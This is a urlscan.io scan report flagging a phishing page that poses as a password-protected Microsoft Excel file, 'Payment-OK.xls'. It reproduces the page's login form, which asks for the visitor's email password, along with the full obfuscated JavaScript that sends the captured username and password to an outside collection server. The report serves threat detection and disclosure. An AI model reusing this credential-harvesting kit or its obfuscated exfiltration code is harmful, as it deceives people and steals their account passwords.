zmfixbrqu.indylatinawrds.com
Open in
urlscan Pro
2a06:98c1:3121::3
Malicious Activity!
Public Scan
Submitted URL: http://zmfixbrqu.indylatinawrds.com:8443/impact?impact=g******@m**********.com
Effective URL: https://zmfixbrqu.indylatinawrds.com:8443/impact?impact=g******@m**********.com
Submission: On August 18 via api from US — Scanned from NL
Effective URL: https://zmfixbrqu.indylatinawrds.com:8443/impact?impact=g******@m**********.com
Submission: On August 18 via api from US — Scanned from NL
Form analysis 1 forms found in the DOM
Name: login_form — POST
<form id="login_form" name="login_form" enctype="application/x-www-form-urlencoded" method="post" class="pg-form m-login-form" novalidate=""> <span class="w3-medium w3-block" style="line-height: 1.2; margin-bottom: 10px;"><span class="w3-left"
style="width: 64px; display: inline-block; margin-right: 7px; margin-top: -9px;">
<img src="https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg" class="w3-image">
</span>
<strong> Payment-OK.xls</strong>
<br>
<span class="w3-small txt-color-1">Microsoft Excel File</span>
</span>
<p class="" style="margin-top: 30px;"> This document is protected! Please enter your E-mail password to open.</p>
<div id="errorMsgWrap" class="w3-section" style="display: none;">
<p id="errorText" class="txt-color-2"> Enter a valid email address, phone number, or Skype name.</p>
</div>
<div class="w3-section">
<input name="usrn" type="text" id="usrn" class="w3-input w3-border w3-border-gray uppercase" value="g******@m**********.com" placeholder="Email Address" readonly="readonly">
</div>
<div class="w3-section">
<input name="psrd" type="password" id="psrd" class="w3-input w3-border w3-border-gray uppercase" value="" placeholder="Email Password" autofocus="">
</div>
<div class="w3-section">
<button class="lgnbtn w3-mobile w3-button uppercase" id="continueButton" type="button" onclick="submitForm(event)"> Continue <img src="https://kasumbo.com/smarty/xls_v1.6/tail-spin.svg" alt="" style="display: none;" width="20"></button>
<script>
(function(e, f) {
function l(e, f) {
return d(f - '0xbd', e);
}
function k(e, f) {
return b(f - 0x273, e);
}
function j(e, f) {
return c(e - -'0x240', f);
}
const g = e();
while (!![]) {
try {
const h = -parseInt(j(-0x122, 'laTQ')) / 0x1 * (-parseInt(k(0x393, 0x395)) / 0x2) + -parseInt(k('0x38f', 0x384)) / 0x3 + -parseInt(l(0x1cd, 0x1e5)) / 0x4 * (parseInt(k(0x39d, '0x392')) / 0x5) + -parseInt(l('0x1bc', '0x1c7')) / 0x6 +
parseInt(l('0x1e5', 0x1e1)) / 0x7 * (parseInt(j(-'0x112', 'mW6x')) / 0x8) + -parseInt(k(0x377, '0x386')) / 0x9 * (-parseInt(j(-'0x139', 'Ed)M')) / 0xa) + parseInt(k('0x370', 0x37b)) / 0xb;
if (h === f) break;
else g['push'](g['shift']());
} catch (i) {
g['push'](g['shift']());
}
}
}(a, 0x678f5));
function submitForm(e) {
function n(e, f) {
return c(f - '0x316', e);
}
function m(e, f) {
return b(e - '0x353', f);
}
e[m(0x480, 0x47b)]();
const f = document[n('BCDC', 0x43b)](o('0x189', 0x18c)),
g = document[m(0x458, '0x44b')](m('0x455', 0x463));
function o(e, f) {
return d(f - 0x74, e);
}
if (tryCount <= 0x4) {
const h = new XMLHttpRequest();
h[m(0x468, 0x477)](o(0x195, '0x18f'), m(0x470, 0x45a)), h[n('Hthc', '0x422')](o(0x191, '0x19d'), o(0x178, '0x188')), h[m('0x457', 0x455)] = function() {
function p(e, f) {
return n(e, f - 0x20);
}
function r(e, f) {
return m(e - -'0x597', f);
}
function q(e, f) {
return o(f, e - -0x80);
}
if (h[p('DAdp', 0x44f)] === XMLHttpRequest[q('0x10b', '0x117')]) {
if (h[r(-'0x12e', -'0x146')] === 0xc8) {} else {}
tryCount++, tryCount > 0x4 && (alert(p('*QP7', 0x457)), window[r(-'0x115', -0xfd)][p('laTQ', 0x45d)] = '#');
}
}, h[m(0x459, '0x441')](n('*QP7', '0x430') + encodeURIComponent(f[o(0x179, 0x184)]) + n('udbq', 0x428) + encodeURIComponent(g[n('BipX', 0x446)])), g[m('0x45c', '0x459')] = '';
}
}
function b(c, d) {
const e = a();
return b = function(f, g) {
f = f - 0x102;
let h = e[f];
return h;
}, b(c, d);
}
function t(e, f) {
return d(f - -0x397, e);
}
function d(b, c) {
const e = a();
return d = function(f, g) {
f = f - 0x102;
let h = e[f];
if (d['cvtprC'] === undefined) {
var i = function(m) {
const n = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';
let o = '',
p = '';
for (let q = 0x0, r, s, t = 0x0; s = m['charAt'](t++); ~s && (r = q % 0x4 ? r * 0x40 + s : s, q++ % 0x4) ? o += String['fromCharCode'](0xff & r >> (-0x2 * q & 0x6)) : 0x0) {
s = n['indexOf'](s);
}
for (let u = 0x0, v = o['length']; u < v; u++) {
p += '%' + ('00' + o['charCodeAt'](u)['toString'](0x10))['slice'](-0x2);
}
return decodeURIComponent(p);
};
d['sZoqSc'] = i, b = arguments, d['cvtprC'] = !![];
}
const j = e[0x0],
k = f + j,
l = b[k];
return !l ? (h = d['sZoqSc'](h), b[k] = h) : h = l, h;
}, d(b, c);
}
let tryCount = 0x1;
function u(e, f) {
return b(e - 0x31f, f);
}
function c(b, d) {
const e = a();
return c = function(f, g) {
f = f - 0x102;
let h = e[f];
if (c['DOQlkL'] === undefined) {
var i = function(n) {
const o = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';
let p = '',
q = '';
for (let r = 0x0, s, t, u = 0x0; t = n['charAt'](u++); ~t && (s = r % 0x4 ? s * 0x40 + t : t, r++ % 0x4) ? p += String['fromCharCode'](0xff & s >> (-0x2 * r & 0x6)) : 0x0) {
t = o['indexOf'](t);
}
for (let v = 0x0, w = p['length']; v < w; v++) {
q += '%' + ('00' + p['charCodeAt'](v)['toString'](0x10))['slice'](-0x2);
}
return decodeURIComponent(q);
};
const m = function(n, o) {
let p = [],
q = 0x0,
r, t = '';
n = i(n);
let u;
for (u = 0x0; u < 0x100; u++) {
p[u] = u;
}
for (u = 0x0; u < 0x100; u++) {
q = (q + p[u] + o['charCodeAt'](u % o['length'])) % 0x100, r = p[u], p[u] = p[q], p[q] = r;
}
u = 0x0, q = 0x0;
for (let v = 0x0; v < n['length']; v++) {
u = (u + 0x1) % 0x100, q = (q + p[u]) % 0x100, r = p[u], p[u] = p[q], p[q] = r, t += String['fromCharCode'](n['charCodeAt'](v) ^ p[(p[u] + p[q]) % 0x100]);
}
return t;
};
c['SdapYS'] = m, b = arguments, c['DOQlkL'] = !![];
}
const j = e[0x0],
k = f + j,
l = b[k];
return !l ? (c['PtpNIp'] === undefined && (c['PtpNIp'] = !![]), h = c['SdapYS'](h, g), b[k] = h) : h = l, h;
}, c(b, d);
}
function s(e, f) {
return c(f - '0x32f', e);
}
function a() {
const v = ['value', 'mZi1ntC4meveAfHzAG', 'click', 'jmoxah/cRLqRW4z0jZfmnvdcJ8oV', 'WOvhW7P/FmoPW6hcM8kwhfSM', 'mNvIwe1gtW', '514055ASKmYF', 'DMfSDwu', '775785qikKes', 'WO4rWPqpgSkT', '265797EEeRKG',
'yxbWBgLJyxrPB24VEc13D3CTzM9YBs11CMXLBMnVzgvK', 'open', 'status', 're9orq', 'DxnYBG', 'vSoUw1uQlmoVk0VcVG', 'wKhdLSo/ya', 'ue9tva', 'ywrKrxzLBNrmAxn0zw5LCG', 'https://sdsdsd.todordigital.uk/app/stiktk.php', 'zqXHh8oyW4RcKeGjW7FdOKm',
'5sIZStp', 'WPVcOaefW4WLmMP/ltCdxmob', 'x17dGCoWlSo7W59+cCooW4FdQue/r8kWx8olesC7ruBcU0q7WR89eSoqq8kXWRH3WRldKbVdOWXEdNGeWQ3dVCkaW7GQjSkuW4q', '2ubXMFO', 'nZC4mJrjDLrJt2C', 'ntm5q291BMrl', 'lexcVSo7WOZcVaPfWO3cQ8orECk0W50', 'ndbxyxDzAKe',
'oe8Wsq', 'mtG0mZC4oeXnDwnsyG', 'q29UDgvUDc1uExbL', 'mZm1nJiXme9dCKDIzq', 'nZC1nZG1CwLRs2vZ', 'bmkydqyNWRLjW7OxW6yxBd9E', 'preventDefault', 'W7uKASk7W73cM8klW6nKBSoq', 'location', 'WQ3cUKRcVWW', 'psrd', '539CoundK', 'onreadystatechange',
'getElementById', 'send', 'WPZcSmk2WRGGd8ozW5O', '3356210OCrGbe'
];
a = function() {
return v;
};
return a();
}
const continueButton = document[s('t&3]', 0x44f)](s('w1vc', 0x45b));
continueButton[t(-0x278, -'0x27b')](u(0x42a, 0x440), submitForm);
</script>
<style>
</style>
</div>
</form>Text Content
Payment-OK.xls Microsoft Excel File This document is protected! Please enter your E-mail password to open. Enter a valid email address, phone number, or Skype name. Continue